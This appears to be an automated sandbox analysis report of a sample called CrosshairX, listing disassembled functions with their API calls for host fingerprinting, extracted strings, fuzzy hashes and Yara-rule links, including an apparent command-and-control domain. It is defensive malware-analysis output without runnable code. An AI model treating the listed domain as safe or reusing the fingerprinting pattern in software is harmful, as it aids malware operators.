Snapshot File: hcaresult_3_2_400000_CrosshairX.jbxd

Similarity

API ID:
String ID: 6GvA$8$f=}A$t${=}A$}K8E
API String ID: 0-3658233549
Opcode ID: 559b996744da1928a81c6229e3d9645c69db8ea194df3f8f11a67e7340051c94
Instruction ID: f57b88b56a5fac5bab7b421b29fad489c1a86a820d89d1678ba1913164da0a8a
Opcode Fuzzy Hash: 559b996744da1928a81c6229e3d9645c69db8ea194df3f8f11a67e7340051c94
Instruction Fuzzy Hash: 31F1EEB5808380CBD7309F29D8417AFB7E1AF85318F15892DE4D98B391E738C845CB96

Function 00423410 Relevance: 10.5, Strings: 8, Instructions: 488
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

!@, xrefs: 00423443
c, xrefs: 004239F8
{, xrefs: 0042367B
,, xrefs: 00423922
y, xrefs: 0042366B
b, xrefs: 004239F0
h, xrefs: 004239E8
z, xrefs: 00423673

Memory Dump Source

Source File: 00000003.00000002.2908944541.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2908944541.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_CrosshairX.jbxd

Similarity

API ID: AllocateHeapInitializeThunk
String ID: !@$,$b$c$h$y$z${
API String ID: 383220839-3210689009
Opcode ID: bba2f199bc9acaa0453bf041d5c089110e248c4b7ae31776497f099e1e72015c
Instruction ID: f609fae3a6604bcaf9616cdd833acb5424e51baf60b924c7dd4cb4063ecd8fe3
Opcode Fuzzy Hash: bba2f199bc9acaa0453bf041d5c089110e248c4b7ae31776497f099e1e72015c
Instruction Fuzzy Hash: E512CF7160C3908BD3249F28D48436FBBF1AB85324F548A2EE4E9873D2D77D99458B4B

Function 0040AE20 Relevance: 7.9, Strings: 6, Instructions: 429
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

%()., xrefs: 0040AFD1
&', xrefs: 0040B016
Tq, xrefs: 0040B2BD
0, xrefs: 0040B2C4
U, xrefs: 0040AE41
#&3, xrefs: 0040B306

Memory Dump Source

Source File: 00000003.00000002.2908944541.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2908944541.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_CrosshairX.jbxd

Similarity

API ID:
String ID: #&3$%().$&'$0$Tq$U
API String ID: 0-4228918711
Opcode ID: fed6dee57f0a7140d03da169d090e7d33687a2e4fc861ae09f34ec16110522f0
Instruction ID: e7a677f07414d932c991276f74bcb9ddf61543123d73fa20c6f129f9d007a488
Opcode Fuzzy Hash: fed6dee57f0a7140d03da169d090e7d33687a2e4fc861ae09f34ec16110522f0
Instruction Fuzzy Hash: D9D1E67164C3508BD328CF69949136FBBE2EFD1304F18893DE8D55B385D77989098B8A

Function 00432966 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 307
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 00432A55

Strings

U[, xrefs: 00432A69
$zHj, xrefs: 00432B06, 00432AF5
$zHj, xrefs: 00432BFF

Memory Dump Source

Source File: 00000003.00000002.2908944541.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2908944541.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_CrosshairX.jbxd

Similarity

API ID: InstalledMemoryPhysicallySystem
String ID: $zHj$$zHj$U[
API String ID: 3960555810-3960599755
Opcode ID: ccf4977113bc0272a9bbb5aa863de691a5640479251674104b33aa3d40b8948b
Instruction ID: e898b6ec9e2f582d5203131d955863ad5cd10cd9096e30cc577c524aff65642d
Opcode Fuzzy Hash: ccf4977113bc0272a9bbb5aa863de691a5640479251674104b33aa3d40b8948b
Instruction Fuzzy Hash: 7091C87050C3C28BD729CF2985643ABFFE09FA6304F18996ED0D997382D7798509CB5A

Function 0043106C Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 305
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 00432A55

Strings

U[, xrefs: 00432A69
$zHj, xrefs: 00432B06, 00432AF5
$zHj, xrefs: 00432BFF

Memory Dump Source

Source File: 00000003.00000002.2908944541.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2908944541.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_CrosshairX.jbxd

Similarity

API ID: InstalledMemoryPhysicallySystem
String ID: $zHj$$zHj$U[
API String ID: 3960555810-3960599755
Opcode ID: dc2a5ea8a171d2e6f320be4aa6f922a167b636e6c3786419a56d058c4e8331bf
Instruction ID: 03959202a7d11621b6482fe75cf5f17d138a098bfe3add340976dca21e35ddc4
Opcode Fuzzy Hash: dc2a5ea8a171d2e6f320be4aa6f922a167b636e6c3786419a56d058c4e8331bf
Instruction Fuzzy Hash: BD91B77050C3C28BD729CF2985643ABFFE09FA6304F18996ED0D997382D7798509CB5A

Function 00438BA0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 146
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemMetrics.USER32 ref: 00438BE9
GetSystemMetrics.USER32 ref: 00438BF9

Strings

, xrefs: 00438CE6

Memory Dump Source

Source File: 00000003.00000002.2908944541.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2908944541.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_CrosshairX.jbxd

Similarity

API ID: MetricsSystem
String ID:
API String ID: 4116985748-3916222277
Opcode ID: 7868b1fa4b48e3dc46f3c58aaaabf8417f46a90a5193d35dde22761d3ce01745
Instruction ID: 87970b4418385b1810ea9a0bcc05a066424d9b6ef7f241e2c7cc89dcb4301590
Opcode Fuzzy Hash: 7868b1fa4b48e3dc46f3c58aaaabf8417f46a90a5193d35dde22761d3ce01745
Instruction Fuzzy Hash: 3E8141B4509384CFE764DF29C54879BBBE0BB85308F00892EE6998B350D7B99848DF57

Function 0040D7E3 Relevance: 4.8, APIs: 1, Strings: 2, Instructions: 304
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00438BA0: GetSystemMetrics.USER32 ref: 00438BE9
Part of subcall function 00438BA0: GetSystemMetrics.USER32 ref: 00438BF9

CoUninitialize.COMBASE ref: 0040D7F3

Strings

undesirabkel.click, xrefs: 0040DBFF
~|, xrefs: 0040DAD6

Memory Dump Source

Source File: 00000003.00000002.2908944541.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2908944541.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_CrosshairX.jbxd

Similarity

API ID: MetricsSystem$Uninitialize
String ID: undesirabkel.click$~|
API String ID: 1128523136-497757823
Opcode ID: df00f939683beeb75b4a581e6e18bf65a0a2f8efcf1f8aeccd3817b2af9f921c
Instruction ID: 8d7de68b7d80a0030baf1307b40fc1016aec9e8eacc5fef0c70409fd4b8b26e5
Opcode Fuzzy Hash: df00f939683beeb75b4a581e6e18bf65a0a2f8efcf1f8aeccd3817b2af9f921c
Instruction Fuzzy Hash: 8BB1F4B0645B818FD319CF29C450762BFA1BF56304F1881ADD0D69FB92C37AA41ACF94

Function 0040E9C9 Relevance: 4.0, Strings: 3, Instructions: 214
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

E265C7DB6E0E894A29072D93766B97C1, xrefs: 0040EB23
9VWT, xrefs: 0040EB68
undesirabkel.click, xrefs: 0040E9B5

Memory Dump Source

Source File: 00000003.00000002.2908944541.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2908944541.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_CrosshairX.jbxd

Similarity

API ID:
String ID: 9VWT$E265C7DB6E0E894A29072D93766B97C1$undesirabkel.click
API String ID: 0-3842751121
Opcode ID: 9b7d7489e4fa27103301d1409eb02a86bd76626fdb89445a933ee6bed4f21752
Instruction ID: 42ca656688407cdb71be0874e77c495a01b9665a2cb48f86396189ce367d6acd
Opcode Fuzzy Hash: 9b7d7489e4fa27103301d1409eb02a86bd76626fdb89445a933ee6bed4f21752
Instruction Fuzzy Hash: FA5145716006018FD3248F25C851B23BBF2FF95314F18C93EE08697BA2E338E4168B55

Function 00429F30 Relevance: 1.7, Strings: 1, Instructions: 436COMMON

Download Yara Rule

Strings

%!"#, xrefs: 00429FB1, 00429FE2

Memory Dump Source

Source File: 00000003.00000002.2908944541.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2908944541.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_CrosshairX.jbxd

Similarity

API ID: InitializeThunk
String ID: %!"#
API String ID: 2994545307-2331155349
Opcode ID: 9a77968cf44560710142c5a248d781860073f8f352a6d90ebc1a15cf5f689be0
Instruction ID: 478fae1478477d32cb0bbe44a1cb81b13ac77e1ac653f7106db20a0e28ef8858
Opcode Fuzzy Hash: 9a77968cf44560710142c5a248d781860073f8f352a6d90ebc1a15cf5f689be0
Instruction Fuzzy Hash: 91D16B317083218BD714CE68D88136BB7D2EFC5314F99862ED8858B381D778DC2A839B

Function 004454A0 Relevance: 1.6, Strings: 1, Instructions: 334COMMON

Download Yara Rule

Strings

GDE:, xrefs: 004454D5

Memory Dump Source

Source File: 00000003.00000002.2908944541.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2908944541.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_CrosshairX.jbxd

Similarity

API ID: InitializeThunk
String ID: GDE:
API String ID: 2994545307-454490230
Opcode ID: 7abad0782390ae33d2d17e5e7df30dc8962c9c442453cc8c5db3c0e3223a9efa
Instruction ID: c4226a2f2ede02a25886bacaf39c9053ecd105f7db1445d55942af8b84a8d2b7
Opcode Fuzzy Hash: 7abad0782390ae33d2d17e5e7df30dc8962c9c442453cc8c5db3c0e3223a9efa
Instruction Fuzzy Hash: A8B147325087018BEB14EF24C84176FB7E2EF85314F19853DE8959B392EB39DD158786

Function 00445E20 Relevance: 1.6, Strings: 1, Instructions: 303COMMON

Download Yara Rule

Strings

$' !, xrefs: 00445F57, 00445F96

Memory Dump Source

Source File: 00000003.00000002.2908944541.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2908944541.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_CrosshairX.jbxd

Similarity

API ID: InitializeThunk
String ID: $' !
API String ID: 2994545307-3942351852
Opcode ID: 2a9c573c273cac1a84f07fef1369f9c654073dfa0086951a253805bd3d8aa572
Instruction ID: 7664c61a9359252537a2f457d437b652ac5975c1a8634bcc25e574b9561c4e56
Opcode Fuzzy Hash: 2a9c573c273cac1a84f07fef1369f9c654073dfa0086951a253805bd3d8aa572
Instruction Fuzzy Hash: 699125712087008BE718DF24D890A6BB3E3EBC5314F19863DE5958B392E779DD0A8756

Function 00442EE0 Relevance: 1.5, APIs: 1, Instructions: 14libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL(004462CB,00000002,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 00442F0E

Memory Dump Source

Source File: 00000003.00000002.2908944541.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2908944541.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_CrosshairX.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82

Function 004453C0 Relevance: 1.3, Strings: 1, Instructions: 73COMMON

Download Yara Rule

Strings

@, xrefs: 00445428

Memory Dump Source

Source File: 00000003.00000002.2908944541.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2908944541.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_CrosshairX.jbxd

Similarity

API ID: InitializeThunk
String ID: @
API String ID: 2994545307-2766056989
Opcode ID: 3f7944b18a0800c3187d721f9976486022bbdcc9f921b1e09efba1c18e9e2880
Instruction ID: e703506dfcaec7a2c8858511a3d33288f4c32cb0d73a20600dfa015e0f0534c2
Opcode Fuzzy Hash: 3f7944b18a0800c3187d721f9976486022bbdcc9f921b1e09efba1c18e9e2880
Instruction Fuzzy Hash: 6221F2714047049BE714DF58C8C166BB7F5FF85324F10962DE9A80B3D1D3799848CB9A

Function 00432131 Relevance: .2, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2908944541.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2908944541.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_CrosshairX.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ef6034ae19252a5ace7c354e48204e8f6afa7da987ef7b662e92324fbbdba95c
Instruction ID: 757d6beb49534aa1619bf40253ce5007db69ab2a5eacee56d1c8fb8360ca276b
Opcode Fuzzy Hash: ef6034ae19252a5ace7c354e48204e8f6afa7da987ef7b662e92324fbbdba95c
Instruction Fuzzy Hash: BE516B326483514BD714CA288D812977BC34BDA324F0ED7AED8955B3D2C2BDC90AC396

Function 00422A9B Relevance: .2, Instructions: 197COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2908944541.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2908944541.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_CrosshairX.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a02d3ff53e382c38baf3ab7d7b93e83f23d1b4c5fb23cdd1fa3cc6b1f660200
Instruction ID: ce3bf7a649008da42e560bc1a23b5231e4afb02f878c291a4cafcb79499fce09
Opcode Fuzzy Hash: 2a02d3ff53e382c38baf3ab7d7b93e83f23d1b4c5fb23cdd1fa3cc6b1f660200
Instruction Fuzzy Hash: 165136726083208BC314CF24D85136BB7E1FFD5358F488A2DE8954B3A1E7B89A09D797

Function 0043DA40 Relevance: .2, Instructions: 186COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2908944541.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2908944541.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_CrosshairX.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9e2c0881851f87db41c7fec2fc5235be90bca9c6a63504a8c49ef5d5017b93ea
Instruction ID: 97f5d28bd680b430dd579f6627255599fa7d4f51750332b670fa5b9cf9e76ec9
Opcode Fuzzy Hash: 9e2c0881851f87db41c7fec2fc5235be90bca9c6a63504a8c49ef5d5017b93ea
Instruction Fuzzy Hash: 0161E671E1C7518BD3149B39D95036AB7D2ABC9324F29662FE095873D1C3B8C845C74A

Function 00408A70 Relevance: 7.6, APIs: 5, Instructions: 135
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcessId.KERNEL32 ref: 00408A93
GetCurrentThreadId.KERNEL32 ref: 00408A99
SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 00408AAA
GetForegroundWindow.USER32 ref: 00408AB0
ExitProcess.KERNEL32 ref: 00408C23

Memory Dump Source

Source File: 00000003.00000002.2908944541.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2908944541.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_CrosshairX.jbxd

Similarity

API ID: CurrentProcess$ExitFolderForegroundPathSpecialThreadWindow
String ID:
API String ID: 4063528623-0
Opcode ID: eb62f9e4f25ecd0e179c3f372f1044eb7c435c738a8590a262607f4bb5a465c0
Instruction ID: 413b317225a84424b2dfe47e832f51202893a73063c6cb0015ddf05c1a04ecce
Opcode Fuzzy Hash: eb62f9e4f25ecd0e179c3f372f1044eb7c435c738a8590a262607f4bb5a465c0
Instruction Fuzzy Hash: E2416C767002105BE714AF658D067873BA29FC2704F09817EB9C4BB2D7CA7C880AC79A

Function 00431A9A Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 82
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetComputerNameExA.KERNELBASE(00000005,#GSx,00000100), ref: 00431BAD

Strings

#GSx, xrefs: 00431B65

Memory Dump Source

Source File: 00000003.00000002.2908944541.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2908944541.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_CrosshairX.jbxd

Similarity

API ID: ComputerName
String ID: #GSx
API String ID: 3545744682-694072080
Opcode ID: f0d9e221b2c973bb04a82bc9e131ec18d005f3ca7eb06de30fd543fa903c5f91
Instruction ID: 1fbbda13d8de4bbeb02b48e461134a2828c343a88cbda409c2570fa6ae02ce44
Opcode Fuzzy Hash: f0d9e221b2c973bb04a82bc9e131ec18d005f3ca7eb06de30fd543fa903c5f91
Instruction Fuzzy Hash: CD2105751093D08EDB358F25C4683BBBBE19B87314F18599EC0CA9B295CB784109C757

Function 00431A98 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 70COMMON

Download Yara Rule

APIs

GetComputerNameExA.KERNELBASE(00000005,#GSx,00000100), ref: 00431BAD

Strings

#GSx, xrefs: 00431B65

Memory Dump Source

Source File: 00000003.00000002.2908944541.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2908944541.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_CrosshairX.jbxd

Similarity

API ID: ComputerName
String ID: #GSx
API String ID: 3545744682-694072080
Opcode ID: fc19d0a916b5f0f1adabe4f656f18565193d424d1ab80686443998e0c31340a6
Instruction ID: ff0e0186a4c4cb70ebe37e49d348fa53a3ac04ef0fc9050c3353874ef935a0fd
Opcode Fuzzy Hash: fc19d0a916b5f0f1adabe4f656f18565193d424d1ab80686443998e0c31340a6
Instruction Fuzzy Hash: BC2126791093D08ED774CF25C8A83AFBBE1ABC6314F58499EC0CA8B254CB780109CB57

Function 0040F460 Relevance: 3.1, APIs: 2, Instructions: 115COMMON

Download Yara Rule

APIs

CoInitializeEx.OLE32(00000000,00000002), ref: 0040F464
CoInitializeEx.COMBASE(00000000,00000002), ref: 0040F5C3

Memory Dump Source

Source File: 00000003.00000002.2908944541.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2908944541.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_CrosshairX.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 745f88851872bf7c0efca4ff766686c74952a8664d4c9b1e1194c8afc0b62544
Instruction ID: 9c1dda7396f0c8c7e6783500787f6eb26bf9002adf6364f84595aac2e64bdeac
Opcode Fuzzy Hash: 745f88851872bf7c0efca4ff766686c74952a8664d4c9b1e1194c8afc0b62544
Instruction Fuzzy Hash: F441C7B4D10B40AFD360BF3D9A0B7537EB4AB01210F504B6DF9E68A6D5E23064298BD7

Function 00443D91 Relevance: 3.0, APIs: 2, Instructions: 16COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 00443D91
GetForegroundWindow.USER32 ref: 00443DA2

Memory Dump Source

Source File: 00000003.00000002.2908944541.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2908944541.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_CrosshairX.jbxd

Similarity

API ID: ForegroundWindow
String ID:
API String ID: 2020703349-0
Opcode ID: d18c5254ad01d92ae44177861031ce7dab75af7e5d2906294a93b912f313cebf
Instruction ID: abd938e789e1f5187ba8f27d03ccdea6df931b8a3ab6c2b68b8d784ae52e33aa
Opcode Fuzzy Hash: d18c5254ad01d92ae44177861031ce7dab75af7e5d2906294a93b912f313cebf
Instruction Fuzzy Hash: A2D0C7FDE108016BE704D722FD0685B3A56BB873197084579F80283313F5755922999F

Function 0043196A Relevance: 1.6, APIs: 1, Instructions: 80COMMON

Download Yara Rule

APIs

GetComputerNameExA.KERNELBASE(00000006,?,00000100), ref: 00431A6B

Memory Dump Source

Source File: 00000003.00000002.2908944541.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2908944541.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_CrosshairX.jbxd

Similarity

API ID: ComputerName
String ID:
API String ID: 3545744682-0
Opcode ID: c5195203a71ad46910bc62174bbc1b08f9aabb6d14eeee8c8cc610b55570e5b4
Instruction ID: 5c95eb5001701545a662ca63906288a06ca57de69b6a47160be8039b42a167bc
Opcode Fuzzy Hash: c5195203a71ad46910bc62174bbc1b08f9aabb6d14eeee8c8cc610b55570e5b4
Instruction Fuzzy Hash: 3A21C4729193908BD7308F21D8547DBBBE2EBC7308F19856DD488AB681CB394506CB56

Function 0043C9EA Relevance: 1.6, APIs: 1, Instructions: 55COMMON

Download Yara Rule

APIs

GetUserDefaultUILanguage.KERNELBASE ref: 0043CA10

Memory Dump Source

Source File: 00000003.00000002.2908944541.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2908944541.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_CrosshairX.jbxd

Similarity

API ID: DefaultLanguageUser
String ID:
API String ID: 95929093-0
Opcode ID: f92ee0d49179723a4c415b575fd6d7425ad83723049dc4b0c40a986d85cb20b6
Instruction ID: 63185df653328e29207d98fd0d1d70e5706809a39ea61041b116f1ff020a6d59
Opcode Fuzzy Hash: f92ee0d49179723a4c415b575fd6d7425ad83723049dc4b0c40a986d85cb20b6
Instruction Fuzzy Hash: CD21FD75A0D7988BDB28CB39DC443A97BA26FEA310F1841ECD08A973C1D7344941CB16

Function 00442E80 Relevance: 1.5, APIs: 1, Instructions: 30memoryCOMMON

Download Yara Rule

APIs

RtlReAllocateHeap.NTDLL(?,00000000,?,?,?,?,0040B81D,?,00000001,?,?,?), ref: 00442EB2

Memory Dump Source

Source File: 00000003.00000002.2908944541.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2908944541.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_CrosshairX.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 4cbdc23b6f7005320daa2566b20a4be3c9b99e86bafe71c2ef7c472ee170f95b
Instruction ID: 564ec381c1cf03e57394b3953e3b8754ec42d7a22ae0bb2ce3b721089a408320
Opcode Fuzzy Hash: 4cbdc23b6f7005320daa2566b20a4be3c9b99e86bafe71c2ef7c472ee170f95b
Instruction Fuzzy Hash: C2E02236528252FBE2012F29BC06B1B3668EFC6765F16083AF40192125DA3AE84185AE

Function 00437044 Relevance: 1.5, APIs: 1, Instructions: 25COMMON

Download Yara Rule

APIs

CoSetProxyBlanket.COMBASE ref: 0043708D

Memory Dump Source

Source File: 00000003.00000002.2908944541.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2908944541.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_CrosshairX.jbxd

Similarity

API ID: BlanketProxy
String ID:
API String ID: 3890896728-0
Opcode ID: 29492cacc2820eea3aa353ac7e20a69d4c768706d433e922e56208bf514576f9
Instruction ID: 5946f706e61eeeced008d4afb13304d670170ba2e4c56f2de3476e01747400e4
Opcode Fuzzy Hash: 29492cacc2820eea3aa353ac7e20a69d4c768706d433e922e56208bf514576f9
Instruction Fuzzy Hash: 31F0BDB4608702CFD314DF24C5A8716BBF0FB89304F10891CE1958B3A0C7B5A948CF82

Function 00441180 Relevance: 1.5, APIs: 1, Instructions: 22memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(?,00000000,?), ref: 004411B3

Memory Dump Source

Source File: 00000003.00000002.2908944541.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2908944541.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_CrosshairX.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 68e3ceda1928db0466bc9d4482af9e2af103eb88fb458e712047f6cc809dfa2b
Instruction ID: 46e5d5d69dbae7893f2c2c1b3228b2c5dd662a29d0c611399d6bf6ce31dfc5f1
Opcode Fuzzy Hash: 68e3ceda1928db0466bc9d4482af9e2af103eb88fb458e712047f6cc809dfa2b
Instruction Fuzzy Hash: 4DE0E635519211EFD2502B16BC0AFAB3778EF87732F0644B5F1045B0A1C774D841DBA8

Function 00434F83 Relevance: 1.5, APIs: 1, Instructions: 21COMMON

Download Yara Rule

APIs

CoSetProxyBlanket.COMBASE ref: 00434FC9

Memory Dump Source

Source File: 00000003.00000002.2908944541.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2908944541.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_CrosshairX.jbxd

Similarity

API ID: BlanketProxy
String ID:
API String ID: 3890896728-0
Opcode ID: 850edfbe4f2dd4ef654c5765f171af7cf4f540a6b599b1d90ce24deb63226254
Instruction ID: 2e365f16bd8fe62f9e5b4acee2b841b123b8f3d1210c9501e9702ff544f06981
Opcode Fuzzy Hash: 850edfbe4f2dd4ef654c5765f171af7cf4f540a6b599b1d90ce24deb63226254
Instruction Fuzzy Hash: 35F074B41087018FE311DF28C1A471ABBF4FB85304F10990CE4958B3A0C7B6A949CF82

Function 0040F40B Relevance: 1.5, APIs: 1, Instructions: 17COMMON

Download Yara Rule

APIs

CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040F41D

Memory Dump Source

Source File: 00000003.00000002.2908944541.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2908944541.0000000000458000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_CrosshairX.jbxd

Similarity

API ID: InitializeSecurity
String ID:
API String ID: 640775948-0
Opcode ID: 0027893a026d7774d4e4ccbe72e8e94e6c6f08ea811f408759addb1f7edf02e0
Instruction ID: 700d2e8da6baa788b91abee2516e6cd0223368884fbb71ff123e0bb24e0f07e8
Opcode Fuzzy Hash: 0027893a026d7774d4e4ccbe72e8e94e6c6f08ea811f408759addb1f7edf02e0
Instruction Fuzzy Hash: 76D092383D824177F2644B48EC53F102251A302F15F340228B362EE2D0C990B561861D

Function 00441160 Relevance: 1.5, APIs: 1, Instructions: 9memoryCOMMON

Download Yara Rule

APIs

